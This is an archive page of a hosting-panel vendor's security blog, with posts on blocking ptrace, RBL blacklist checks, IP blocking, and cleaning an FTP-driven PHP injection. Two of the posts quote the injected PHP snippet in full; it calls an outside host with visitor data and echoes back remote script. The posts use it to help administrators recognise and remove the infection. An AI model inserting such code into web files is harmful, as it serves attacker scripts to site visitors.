Blog

Archive for Security

KB: 07072014-001: Disabling ptrace() syscall

Keyword index

Introduction

The following article explains how to disable system call ptrace() in various platforms (see list of supported platforms). By disabling this system call you can remove a large source of security problems and a linux kernel feature that is used by many attacks to implement hard to detect modifications like in-flight memory process modification.

The article proposes disabling the ptrace syscall by installing a kernel module that disables it.

Supported platforms

  • Debian Squeeze amd64
  • Debian Squeeze i686
  • Debian Wheezy amd64
  • Ubuntu Precise LTS 12.04 amd64
  • Linux Mint 13 Maya amd64

Installing the module

To have the module installed, you have to update your /etc/apt/sources.list file to include the right apt sources. See in the following link the right one for your distribution:

https://dolphin.aspl.es/svn/publico/noptrace2/README

After that, you only have to update references and install it by running:

apt-get update
apt-get install noptrace2

After that, the module will be compiled using your current server/system settings and will be loaded if no problem is found.

How do I check if the module is actually blocking ptrace() calls?

Run the following command. You should get a “No child processes”:

strace -p 1
Process 1 attached - interrupt to quit
detach: ptrace(PTRACE_DETACH, ...): No child processes
Process 1 detached

How do I enable/disable it temporally?

You can use the following command to stop/unload the module causing ptrace() blocking to be removed:

service noptrace2 stop

At the same time, you can use the following command to reenable the module that blocks ptrace():

service noptrace2 start

Do this generates any operation log I can inspect?

Sure, take a look at your /var/log/syslog. You should get logs like this:

Jul 7 11:14:40 vulcan kernel: [4721108.617232] [noptrace2] ptrace syscall disabled
Jul 7 11:14:54 vulcan kernel: [4721122.990270] [noptrace2] ptrace() invoked against process 1 by process 20675
Jul 7 11:14:54 vulcan kernel: [4721122.990304] [noptrace2] ptrace() invoked against process 1 by process 20675
Jul 7 11:15:02 vulcan kernel: [4721130.689160] [noptrace2] ptrace() invoked against process 29912 by process 20746
Jul 7 11:15:02 vulcan kernel: [4721130.689188] [noptrace2] ptrace() invoked against process 29912 by process 20746
Jul 7 11:15:22 vulcan kernel: [4721150.219577] [noptrace2] ptrace syscall restored
Jul 7 11:15:44 vulcan kernel: [4721172.921028] [noptrace2] ptrace syscall disabled
Jul 7 18:11:15 vulcan kernel: [4746103.948870] [noptrace2] ptrace() invoked against process 1 by process 9821
Jul 7 18:11:15 vulcan kernel: [4746103.948897] [noptrace2] ptrace() invoked against process 1 by process 9821

Did you like the article, found it useful or something to comment?

That’s good. Please,  contact us at http://www.core-admin.com/portal/about-us/contact or follow use at https://twitter.com/core_adm or https://twitter.com/aspl_es

Posted in: Administration, Debian, Debian Squeeze, Debian Wheezy, Linux Mint, Security, Ubuntu, Ubuntu Precise LTS

Leave a Comment (0) →

Using Core-Admin to resolve php+# web hacking

After a revision you find out that several web pages have been updated with code like follow or maybe a customer whose web is being blocked by the web browser is calling you because it is including suspicous code like:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) &amp;&amp; !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&amp;referer=".urlencode($_SERVER['HTTP_HOST'])."&amp;ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

These attacks do not pose any harm to the server if it is properly configured, but makes affected webpages to execute remote chatting code o ads that will make google chrome and many other browsers to block those pages because running that suspicious code.

Understanding these attacks

The problem about these attacks is that they update original files by including a “chirurgical” modifications making it difficult and annoying to get back to original state.

One option is to have a backup, but with the newer webs which use different shorts of caches and php-to-string files, makes it hard to recover. It is not possible to just recover those files by just replacing. You must get back to a consistent state (for example the last backup). This implies removing current web files and recover from backup files (so backup files don’t get mixed with current files that weren’t including at the backup).

After this, you must remember resetting/blocking all FTP accounts/password that were used during the attack.

First line of defense: know when happens the attack

Core-Admin provides you these knoledge as the attack happens. After the modification, Core-Admin’s file system watching service will report “possible php hash attack found” with an indication like follows:

Core-Admin: detecting php hash attack

After receiving this notification, you only have to run the following comand to find out the amount of files that were modified and the amount of FTP accounts that were compromised. The same command will help you through out the process of recovering infected files and updating ftp accounts’ password.

>> crad-find-and-fix-phphash-attack.pyc

After running above command, which only reports, you can now execute the same command with the following options to fix found files and to update FTP accounts:

>> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts

How did this attack happen?

This attack is connected with a network of servers that are in charge of applying these modifications along with a virus/malware software that infects machines that use known FTP clients. Here is how the attack develops:

  1. By using known FTP clients that save passwords at known places at the file system, the first part of the attack is established..
  2. It is suspected that using public Wifis and insecure networks while creating FTP session may be part of the problem too.
  3. After this, your machines get exposed to the virus/malware software that extracts stored FTP accounts by sending it to the servers that will perform the FTP attack.
  4. With this information, modification servers (that’s how we call them) that finally attack by using those FTP accounts, downloading original files, updating them and then uploading them back to its original place.

Important notes about the attack

It is important to understand that modification servers do not carry out the attack just after receiving compromised FTP passwords. They will wait to have several passwords to the same system and also they will delay the attack to disconnect both incidents (the web hack and the infection at your computers).

This way, they hope unaware users to not connect both incidents which otherwise will trigger a anti-virus scan by the user to stop information leaking.

In the other hand, they also wait to have several accounts to carry out a massive attack looking for confusion and/or magnitude to increase likehood that part of the infection will survive.

How can I prevent it?

There are several actions you can take to avoid these attacks:

  1. Try to not save FTP accounts in your FTP client. Try to save them into an application that stores those passwords protected by a password..
  2. Avoid using public Wifis and untrusted shared connections (like hotels) to connect to your FTP servers.
  3. If it is possible, after doing FTP modifications, enable read-only mode or disable the FTP account using Core-Admin panel. This way, even though the password is compromised, no modification will be possible..

Posted in: Core-Admin, Core-Admin Web Edition, PHP, Security

Leave a Comment (0) →

Automatic and integrated (DNS RBL) blacklist detection for Core-Admin

Do you ever wanted to know automatically when your servers get blacklisted (DNS RBL)?

For next Core-Admin release we have included a handy checker (rbl_check_checker) that allows to check against more than 100 known DNS rbl blacklists if any of your server IPs is blacklisted. And, if any server is listed, the checker tells you where to go to get more information to proceed to unblock them.

The checker also detects local lan IPs and in that case, it uses automatically a remote service to guess which public IP is running your server. Now, with this information the checker is able to also check for blacklisting those local/lan servers.

The checker integrates automatically into your Core-Admin and will give you fresh information for all your servers connected to the panel. See in action:

Improving your server IP reputation for mail deliveries

By having rbl-check checker running in your servers you can improve hugely your servers IP reputation because you can get instant information about any blacklisting for any running IP as it happens.

A prompt response is key to solve IP reputation problems. The faster you solve them, the less your mail services get affected. With that information you can react promptly taking required measures and to request IP blacklist removal.

Posted in: Blacklist, Core-Admin, Security

Leave a Comment (0) →

KB: 21012014-001: Fixing webhosting php-hash-update attack

Symptom

Core-Admin has reported unallowed changes at your hosting files and taking a look on them you find that they were updated with something similar to:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) &amp;&amp; !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&amp;referer=".urlencode($_SERVER['HTTP_HOST'])."&amp;ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

Affected releases

All

Background

This attack is done through the FTP server, downloading the original file and then updating it with the additional content. In essence, the attack looks for updating your files adding additional content without updating the rest.

This attack is possible because the password was stolen from a compromised equipment that has some virus or malware that looks for stored password at known locations or because an FTP session was opened using this password over an unsecure connection (like public wifis).

Solution

You have to find which files were updated to remove the “additional content added”. Also, you must reset password for all FTP accounts that were used to run this attack. Fortunetaly Core-Admin already includes an application that automates these tasks.

Follow next instructions to cleanup and reset all required FTP accounts:

  1. Run the following command as root in a server’s shell:
    >> crad-find-and-fix-phphash-attack.pyc
  2. Once finished, it will report which files were updated and which FTP account were compromised. Now, run the tool again asking to fix this:
    >> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts

Posted in: KB, Security

Leave a Comment (0) →

How to block Ips and how to manage currently blocked IPs

Blocing IPs with Core-Admin

To be able to manage currently blocked IP you need a machine administrator or platform admin user.

Once you sign in into core-admin, select the machine you want to manage from the left side panel (Machines) and after the machine administrator panel show up, then  click on “Ip blocker (2)”

Inside that application you’ve got on the left side currently blocked Ips section. Click on it “Blacklisted IPs” (3).

After clicking, it’ll appear the list of currently blocked IPs on this specific server along with other information about the kind of blocking applied and why. To add a new IP to block, click on  ”Add blacklisted ip” (4) on the toolbar located at the top of the list:

This will show a new form where we have to indicate the IP to block (5).

It is also recommended to write a comment about the blocking (why or event it) so you can better identify this later.

We have to also choose between permanent or temporal blocking (6). If you select temporal blocking, we have indicate for how long we want it to be blocked. If you click on the   icon, you’ll see various references to time equivalences.

Then, please to “Add a new Blacklisted ip” (7) at the bottom to save changes.

 

Removing a blocked IP from Core-Admin

To remove an IP blocked we have to click on the Blacklisted IPs (3) section (on the left panel) as we did in previous section.

Then we have to click on the blacklisted IP record we want to remove (4):

After that, a new window will show up allowing to manage this IP blocked record.

Then we have to click on “Remove blacklisted IP” (5).

 

Adding IPs to the blocking exception list with Core-Admin

Another useful option we have available with ip blocker tool is the blocking exception. This will allow us to manage which IPs shouldn’t be blocked automatically due to security processes that are automatically activated by Core-Admin or applications using blocking services from it.

To add a blocking exception is pretty straightforward. Once we have launched the IP blocker application, (steps 1 and 2), we have to click on “Unblockable IPs”(3) and then click on “Add whitelisted ip” (4).

A new window will appear where we can fill the details about the IP that mustn’t be blocked even when requested.

We provide the IP at (5).

It is really recommended to provide a comment or an event id to better identify this record later.

We also indicate the kind of record:  permanent o temporal (6).

Once finished, click on  “Add a new whitelisted Ip” (7).

 

IP blocker integration with your scripts and applications: commands

IP blocker application includes a shell script and a Python interface that allows other applications to trigger blocking operations in a manner that is consistent with the platform and with the advantage that all these blocking operations can be managed through the core-admin interface.

Here is the list of commands that can be used:

  • Show current blocking list
    >> crad-ip-blocker.py -l
  • Add a temporal blocking for 3600 seconds
    >> crad-ip-blocker.py -a IP temporal 3600 “Why it was blocked”
  • Add a permanent block
    >> crad-ip-blocker.py -a IP permanent
  • Remove a blocking
    • First show current rules:
      >> crad-ip-blocker.py -l
    • Then, choose one (picking the id) and the run:
      >> crad-ip-blocker.py -r ID

 

Contact

Feel free to contact us if you have questions or doubts while using Core-Admin. Use the following contact information to reach us.

 

 

Posted in: Core-Admin, Security

Leave a Comment (0) →
Page 2 of 2 12